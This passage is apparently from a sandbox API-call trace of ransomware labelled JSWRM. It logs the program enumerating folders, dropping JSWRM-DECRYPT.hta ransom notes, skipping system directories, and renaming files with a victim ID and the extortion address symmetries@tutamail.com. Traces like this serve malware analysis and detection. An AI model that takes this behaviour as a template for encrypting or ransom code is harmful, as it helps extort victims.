(HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.204] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\jswrm-decrypt.hta")) returned 0xffffffff [0068.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.205] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.205] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.206] CloseHandle (hObject=0x454) returned 1 [0068.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\jswrm-decrypt.hta")) returned 0x20 [0068.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.207] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4fd2ff, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0068.208] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.208] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4fd2ff, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.318] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.318] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.318] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f4fd2ff, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f4fd2ff, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f4fd2ff, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.318] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.319] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.319] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.319] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10088190985886152) returned 0 [0068.319] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.320] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.320] CloseHandle (hObject=0xffffffff) returned 1 [0068.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0068.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0068.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.320] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.320] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.320] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0068.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.321] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2=".") returned 1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="..") returned 1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="...") returned 1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="windows") returned -1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="recovery") returned -1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="perflogs") returned -1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="documents and settings") returned 1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="$RECYCLE.BIN") returned 1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="system volume information") returned -1 [0068.321] lstrcmpiW (lpString1="hr-HR", lpString2="msocache") returned -1 [0068.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\jswrm-decrypt.hta")) returned 0xffffffff [0068.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.323] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.323] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.324] CloseHandle (hObject=0x454) returned 1 [0068.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\jswrm-decrypt.hta")) returned 0x20 [0068.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.325] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f626fbf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232080 [0068.325] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.325] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f626fbf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.325] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.325] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.325] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f626fbf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f626fbf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f626fbf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, 